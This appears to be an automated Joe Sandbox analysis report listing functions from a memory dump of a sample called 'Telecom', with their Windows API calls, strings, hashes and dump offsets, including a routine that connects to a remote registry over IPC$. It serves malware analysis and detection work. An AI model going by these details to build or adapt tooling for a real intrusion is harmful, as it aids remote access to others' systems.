Instruction ID: 72f07972332c43d78ba05061e36f2ed814e6bdecc82fc4a75f04a4775f44127f
Opcode Fuzzy Hash: 71d11d19173092f8a886256f7c5f7d04793772a47dd2ced75e1fcc9423b386d0
Instruction Fuzzy Hash: BA514EB4F01205AFDB08CFA8CD89AAEBBB9FB58314F15812AF519E6290D7749D008B54

Uniqueness

Uniqueness Score: -1.00%

Function 00442128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242

GetSysColor.USER32(0000000F), ref: 00442152

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d0b17eb91a95f2fdbcd1516666e4ba50bc67744980878719fe19d5bfc44f3877
Instruction ID: df7988a92c033f1f308a5fa24a137d0d18966c995942a5683aaf43188a2365e2
Opcode Fuzzy Hash: d0b17eb91a95f2fdbcd1516666e4ba50bc67744980878719fe19d5bfc44f3877
Instruction Fuzzy Hash: 0E410331501640AFEB205F38DC44BBA3BA5EB06731F544657FAA2872E1C7B98D42DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004413A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004828D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004828EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004828FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00482912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00482933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00482942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0048295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004411F5,00000000,00000000,00000000,000000FF,00000000), ref: 0048296E

Strings

(Q, xrefs: 00482885

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (Q
API String ID: 1268354404-2768264020
Opcode ID: f07bd4a234e7a2b5265628f14662cba2d5d4d32c81bb45d5d2462a89ebd587aa
Instruction ID: 803b7733d616bf0b12b01456d766a2ff9061fe1cc06c4272514ec82dca32a01b
Opcode Fuzzy Hash: f07bd4a234e7a2b5265628f14662cba2d5d4d32c81bb45d5d2462a89ebd587aa
Instruction Fuzzy Hash: 38519D70A00309AFEB20DF25CD45BAA7BB5FF48314F10452AF942972A0D7B4ED91DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004D955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

Part of subcall function 004419CD: GetCursorPos.USER32(?), ref: 004419E1
Part of subcall function 004419CD: ScreenToClient.USER32(00000000,?), ref: 004419FE
Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000001), ref: 00441A23
Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000002), ref: 00441A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 004D95C7
ImageList_EndDrag.COMCTL32 ref: 004D95CD
ReleaseCapture.USER32 ref: 004D95D3
SetWindowTextW.USER32(?,00000000), ref: 004D966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004D9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 004D975B

Strings

(Q, xrefs: 004D956D
@GUI_DRAGFILE, xrefs: 004D96F6
(Q, xrefs: 004D9728
@GUI_DROPID, xrefs: 004D96AD

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$(Q$(Q
API String ID: 1924731296-1218897950
Opcode ID: 801360fbdac1b03afafa54459f4236a1dde899bd7d160f4c80476e57dab26aff
Instruction ID: d086b1a5d15b2dcf46f6d41c2257fb6fc11d191d8efec44e47f84823cfd4de73
Opcode Fuzzy Hash: 801360fbdac1b03afafa54459f4236a1dde899bd7d160f4c80476e57dab26aff
Instruction Fuzzy Hash: E4519D70604300AFE704EF25CC66FAA77E4FB84718F40062EF995962E1CB749D48DB56

Uniqueness

Uniqueness Score: -1.00%

Function 004AA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00490D31,00000001,0000138C,00000001,00000002,00000001,?,004BEEAE,00512430), ref: 004AA091
LoadStringW.USER32(00000000,?,00490D31,00000001), ref: 004AA09A

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00490D31,00000001,0000138C,00000001,00000002,00000001,?,004BEEAE,00512430,?), ref: 004AA0BC
LoadStringW.USER32(00000000,?,00490D31,00000001), ref: 004AA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004AA1E0

Strings

Line %d:, xrefs: 004AA11A
%s (%d) : ==> %s: %s %s, xrefs: 004AA1C4
Error: , xrefs: 004AA197
^ ERROR, xrefs: 004AA175
Line %d (File "%s"):, xrefs: 004AA109

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 81ee70679b1003752552ea136a9da0a324360029018c41d0d1a5d892c4f8ac76
Instruction ID: bad48b7de1b00a09613bafb2dbdeefd1231a7ffb762c3117b51297341ea77be4
Opcode Fuzzy Hash: 81ee70679b1003752552ea136a9da0a324360029018c41d0d1a5d892c4f8ac76
Instruction Fuzzy Hash: 13415272800119AADF05EBE1DD46DEEB778EF19308F10006AB501B2092DB796F59CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004A1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004A10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004A10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004A10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004A111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004A1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004A112D

Strings

\IPC$, xrefs: 004A1075
\CLSID, xrefs: 004A1015
SOFTWARE\Classes\, xrefs: 004A0FFF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 85e57d875d07d4480611cd5cbd62d650e18863be11f10f376557150cddde7557
Instruction ID: 0c42da070a164fe450cc72667e8af6ac550e69beb21c5dce4ddc33e94f6a4790
Opcode Fuzzy Hash: 85e57d875d07d4480611cd5cbd62d650e18863be11f10f376557150cddde7557
Instruction Fuzzy Hash: 64410A72C10229ABDF11EFA5DC45DEEB7B8FF18754F00406AE901A7160EB359E04CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004D4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004D4AD9
CreateCompatibleDC.GDI32(00000000), ref: 004D4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004D4AF3
SelectObject.GDI32(00000000,00000000), ref: 004D4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 004D4B06
DeleteDC.GDI32(00000000), ref: 004D4B10
GetWindowLongW.USER32(?,000000EC), ref: 004D4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 004D4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 004D4B3C

Strings

static, xrefs: 004D4A71

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 740fca3751b35bc7938b121b7bc34988e292e79e034c8d9140607233b8a30750
Instruction ID: 1fe3bf9aea1e375433ec501536efbb607445d44c77d9e941b00bf3c056d18ddc
Opcode Fuzzy Hash: 740fca3751b35bc7938b121b7bc34988e292e79e034c8d9140607233b8a30750
Instruction Fuzzy Hash: 28318E31541215BBDF119FA5DC08FDB3BA9FF59324F110227FA18A62A0C739D860DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004C468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004C46B9
CoInitialize.OLE32(00000000), ref: 004C46E7
CoUninitialize.OLE32 ref: 004C46F1
_wcslen.LIBCMT ref: 004C478A
GetRunningObjectTable.OLE32(00000000,?), ref: 004C480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 004C4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 004C496B
CoGetObject.OLE32(?,00000000,004E0B64,?), ref: 004C498A
SetErrorMode.KERNEL32(00000000), ref: 004C499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004C4A21
VariantClear.OLEAUT32(?), ref: 004C4A35

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: f7106ea030b862e56509037fead7eacfc71708e330f22ac6be4743abc4e54191
Instruction ID: c6947ac22ae355e8a4e85ec892ccfe908873d156fc925cab8fbc3a14e955ba5b
Opcode Fuzzy Hash: f7106ea030b862e56509037fead7eacfc71708e330f22ac6be4743abc4e54191
Instruction Fuzzy Hash: 39C146B9604301AF9740DF69C990E2BB7E9FF89748F00491EF8899B210D734ED05CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004B84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004B8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004B85D4
SHGetDesktopFolder.SHELL32(?), ref: 004B85E8
CoCreateInstance.OLE32(004E0CD4,00000000,00000001,00507E8C,?), ref: 004B8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004B86B9
CoTaskMemFree.OLE32(?,?), ref: 004B8711
SHBrowseForFolderW.SHELL32(?), ref: 004B879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004B87BF
CoTaskMemFree.OLE32(00000000), ref: 004B87C6
CoTaskMemFree.OLE32(00000000), ref: 004B881B
CoUninitialize.OLE32 ref: 004B8821

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: b958038bfda1250d534e5e4590e444c70e805b9eee4772e6b6aecd6804005212
Instruction ID: beb970244083d4e3813f4465e93d167fb99eea952ce5f52b110823582d0d0c69
Opcode Fuzzy Hash: b958038bfda1250d534e5e4590e444c70e805b9eee4772e6b6aecd6804005212
Instruction Fuzzy Hash: 1BC10B75A00109AFDB14DFA5C884D9EBBF9FF48308B1484AAE419DB361DB34ED45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004A0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004A039F
SafeArrayAllocData.OLEAUT32(?), ref: 004A03F8
VariantInit.OLEAUT32(?), ref: 004A040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 004A042A
VariantCopy.OLEAUT32(?,?), ref: 004A047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 004A0491
VariantClear.OLEAUT32(?), ref: 004A04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 004A04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A04BC
VariantClear.OLEAUT32(?), ref: 004A04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A04D9

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 86bd01e868ea7fd7efc8a572ffea645b789773acd6e579b1db62d4485297ea9b
Instruction ID: 89a8d8b831ae02acb326227cd75e387d19fc62582813ce0f360dc04d6bdb8787
Opcode Fuzzy Hash: 86bd01e868ea7fd7efc8a572ffea645b789773acd6e579b1db62d4485297ea9b
Instruction Fuzzy Hash: E9417F31E00219AFCF10DFA5D8489EE7BB9FF19344F00806AE905A7261CB78A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004C4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 004C41D1
CoUninitialize.OLE32 ref: 004C41DC
CoCreateInstance.OLE32(?,00000000,00000017,004E0B44,?), ref: 004C4236
IIDFromString.OLE32(?,?), ref: 004C42A9
VariantInit.OLEAUT32(?), ref: 004C4341
VariantClear.OLEAUT32(?), ref: 004C4393

Strings

Failed to create object, xrefs: 004C4241, 004C42F7
Invalid parameter, xrefs: 004C42C2
NULL Pointer assignment, xrefs: 004C427B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: ac7a24601efa45391933ae40857c61dc7867d526a987ceb5e2df84ff165c7bc5
Instruction ID: 5e9da3d56043fe27c1d5e598002d5fdfffdd9bbee3d145e65ac87c5f811c20fc
Opcode Fuzzy Hash: ac7a24601efa45391933ae40857c61dc7867d526a987ceb5e2df84ff165c7bc5
Instruction Fuzzy Hash: 3A61CF74604301AFD310DF65C999F6EBBE4AF89754F00045EF8819B2A1C778ED48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004B8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004B8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 004B8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004B8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004B8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8DDA

Strings

*.*, xrefs: 004B8DE0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 792d5716c4d8604f509b4b1895ae95dc0a50b6008715f5f736cbf86893915245
Instruction ID: 583c63c99e554689543f45aad0c47118b85d1952096d857459cdf1ab24569bc4
Opcode Fuzzy Hash: 792d5716c4d8604f509b4b1895ae95dc0a50b6008715f5f736cbf86893915245
Instruction Fuzzy Hash: CD6159B2504305AFDB10EF61C84499EB7ECFF99314F04482FE98987251DB39E945CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004D46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 004D4715
SetMenu.USER32(?,00000000), ref: 004D4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D47AC
IsMenu.USER32(?), ref: 004D47C0
CreatePopupMenu.USER32 ref: 004D47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004D47F7
DrawMenuBar.USER32 ref: 004D47FF

Strings

F, xrefs: 004D47EA
0, xrefs: 004D46F0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: bec4fcf6442e512603c5f790ee5b4abb228535084f9fa1e53fdb9259f2dcb3fd
Instruction ID: c4afe98316349eaf755bbadbce89b6e4a4ef09394df3e77e08185437243be9ba
Opcode Fuzzy Hash: bec4fcf6442e512603c5f790ee5b4abb228535084f9fa1e53fdb9259f2dcb3fd
Instruction Fuzzy Hash: 7B41BA78A02209EFDB14DF64E894EAA7BB5FF49304F04402EFA0597350C774A914DF68

Uniqueness

Uniqueness Score: -1.00%

Function 004A282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 004A28B1
GetDlgCtrlID.USER32 ref: 004A28BC
GetParent.USER32 ref: 004A28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 004A28DB
GetDlgCtrlID.USER32(?), ref: 004A28E4
GetParent.USER32(?), ref: 004A28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 004A28FB

Strings

ListBox, xrefs: 004A286E
ComboBox, xrefs: 004A2839

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 7d529e93f15c04050715ed099e8e141237d80e60680f14cc4eb21955ebe336a2
Instruction ID: cc27d40a1b0a167a22d743a027e81d0f22a8235c11fc58df714ed82956e51967
Opcode Fuzzy Hash: 7d529e93f15c04050715ed099e8e141237d80e60680f14cc4eb21955ebe336a2
Instruction Fuzzy Hash: 9621B3B4D00118BBDF04AFA5CC85DEEBBB8EF16314F00016BB951972D1DB798819DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004A290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 004A2990
GetDlgCtrlID.USER32 ref: 004A299B
GetParent.USER32 ref: 004A29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004A29BA
GetDlgCtrlID.USER32(?), ref: 004A29C3
GetParent.USER32(?), ref: 004A29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004A29DA

Strings

ListBox, xrefs: 004A294F
ComboBox, xrefs: 004A291A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 1a09967534182818491ebe948e7f7d15c134c1e58881522682d068188fc6c55e
